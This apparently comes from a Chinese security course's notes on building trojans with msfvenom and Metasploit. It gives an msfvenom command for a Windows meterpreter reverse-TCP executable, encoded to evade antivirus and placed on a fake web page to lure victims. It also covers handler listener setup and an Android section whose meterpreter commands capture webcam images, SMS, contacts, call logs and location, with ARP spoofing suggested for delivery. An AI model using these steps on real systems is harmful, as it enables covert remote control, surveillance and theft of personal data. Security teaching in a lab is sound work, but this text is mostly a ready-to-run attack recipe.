木马生成

简介: 木马生成

攻击复现

1. 生成病毒

参数解释

1. -p payload

攻击所用的 payload ,这里使用 windows/meterpreter/reverse_tcp ,获取反弹

shell 。

2. lhost local host

攻击方 IP 地址。

3. lport local port

攻击方端口,这个端口与 msfconsole 中监听的要一致。

4. -e encoders

将程序进行编码,以绕过杀毒软件的检测,这里我们使用 x86/alpha_mixed 。

5. -i iterator times

迭代的次数,因为每次编码是对上一次编码的内容再次进行编码,在计算机领域这种操作叫

做“迭代(iterator)”,因此参数是 i .

迭代的过程中程序的体积会越来越大,因此要适当控制迭代次数。

6. -f file type

msfvenom -p windows/meterpreter/reverse_tcp lhost=[本地 IP] lport=[监听端口] -e [编

码方式] -i [编码次数] -f [格式] >[木马程序文件名]

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.124 lport=8848 -e

x86/alpha_mixed -i 1 -f exe >/home/yijin/fake-page/static/evil.exe

这里我们是要生成 Windows 可执行程序,因此格式为 exe 。

7. > 写入文件

我们将在 /home/yijin/fake-page/ 下跑一个网页服务,并诱导靶机从这里下载木马,因此

放在这个目录下。

2. 启动网页

网页内容已经放在了 /home/yijin/fake-page/ 目录,在这里执行 node server.js 启动服务。

3. 开启端口监听

1. msfconsole 进入 metasploit 控制台;

2. use exploit/multi/handler 使用“多面手”模块;

3. set payload windows/meterpreter/reverse_tcp 设置 payload;

4. set LHOST [IP] 设置本地IP(攻击机 IP);

5. set LPORT [PORT] 设置本地监听端口;

6. run 开始监听。

4. 靶机下载并运行木马

如无意外,在 msfconsole 输入 shell 即可拿到 shell;

whoami 查看自己身份;

可以通过关机来展示攻击成果。

5. 可演示操作

whoami 账号名称

ver 版本信息

winver windows 版本信息

hostname 主机名

ipconfig IP 地址

call xx.bat

mshta javascript:confirm("Hello world!");window.close() 弹窗问候

strat iexplore "ke.yijincc.com"

time /t 显示当前时间

安卓木马

复现步骤

老师:由于时间的关系,我们这里还是把生成的木马程序放到那个网站下,但是由于时间关系,我们就

不去改网站源码了,直接访问它的一个下载地址就行。

1. 打开模拟器,运行一个安卓系统

2. msfvenom 生成木马

3. msfconsole 开始监听

1. msfconsole 进入 metasploit 控制台;

2. set payload windows/meterpreter/reverse_tcp 设置 payload;

3. set LHOST [IP] 设置本地IP(攻击机 IP);

4. set LPORT [PORT] 设置本地监听端口;

5. run 开始监听。

4. 靶机下载、并运行木马

靶机访问攻击机页面(这里可以结合 ARP 欺骗,也可以直接访问 IP),并下载木马,运行。

!注意,这里不用输入 shell;

whoami 查看自己身份;

安卓命令

1. check_root 检查是否已经 root;

2. sysinfo 查看系统信息;

3. webcam_list 枚举摄像头;

4. webcam_snap -i [CAM INDEX] 使用指定的摄像头拍照;

5. webcam_stream 从指定的摄像头播放视频流;

6. 图片文件搜索;

7. 下载文件;

8. dump_sms 获取短信;

9. dump_contacts 下载通讯录;

10. geolocate 查看定位,但是需要安装谷歌地图;

11. dump_calllog 下载通话记录;

相关文章
|
18天前
|
程序员
什么是后门
后门( Back Door )是指一种绕过安全性控制而获取对程序或系统访问权的方法。在软件的开发阶段,程序员常会在软件内创建后门以便可以修改程序中的缺陷。如果后门被其他人知道,或是在发布软件之前没有删除,那么它就成了安全隐患。
|
3月前
|
开发框架 安全 .NET
Web安全-一句话木马
Web安全-一句话木马
147 5
|
3月前
|
安全 NoSQL Linux
常见的挖矿木马
常见的挖矿木马
88 0
|
7月前
|
安全 数据安全/隐私保护
webshell后门分析
webshell后门分析
106 3
|
安全 Linux PHP
浅谈木马
浅谈木马远控 在听过某网安教育关于浅谈的公开课后,结合本人学过的东西,以及自己实践过的经历。在此分享下木马对我们的影响。
|
安全 网络安全 PHP
WebShell是什么?如何抵御WebShell?
WebShell是什么?如何抵御WebShell?
|
开发框架 安全 Java
网站后门木马查杀该怎么删除
收到阿里云的短信提醒说是网站存在后门,webshell恶意通信行为,紧急的安全情况,我第一时间登录阿里云查看详情,点开云盾动态感知,查看了网站木马的详细路径以及webshell的特征,网站从来没有出现过这种情况,一脸懵逼,无奈询问度娘吧,百度搜索了什么是webshell,为了解决这个问题,我可是下了很大的功夫,终于了解清楚并解决了阿里云提示网站后门的这个问题,记录一下我解决问题的过程。
378 0
网站后门木马查杀该怎么删除
|
监控 前端开发 安全
webshell内存木马的介绍与应用
内存马,也就是无文件格式webshell,检查难度系数很大,运用分布式数据库(apache、mvc这种)去运行恶意程序。适合情景为一些web应用为jar包运行,无网站文件目录、想写文件格式找不着网站文件目录相对路径等。内存马的注入一般搭配反序列化安全漏洞开展运用,如spring反序列化安全漏洞、fastjson反序列化、weblogic反序列化这种;也是有先提交着地文件格式,随后浏览注入内存马的,这类实际上 没有什么必要性,暂时性忽视。1个最实用的内存马方式便是https://ip:port/
373 0
webshell内存木马的介绍与应用
|
监控 安全 程序员
服务器里如何查杀网站后门文件
收到阿里云的短信提醒说是网站存在后门,webshell恶意通信行为,紧急的安全情况,我第一时间登录阿里云查看详情,点开云盾动态感知,查看了网站木马的详细路径以及webshell的特征,网站从来没有出现过这种情况,一脸懵逼,无奈询问度娘吧,百度搜索了什么是webshell,为了解决这个问题,我可是下了很大的功夫,终于了解清楚并解决了阿里云提示网站后门的这个问题,记录一下我解决问题的过程。
3879 0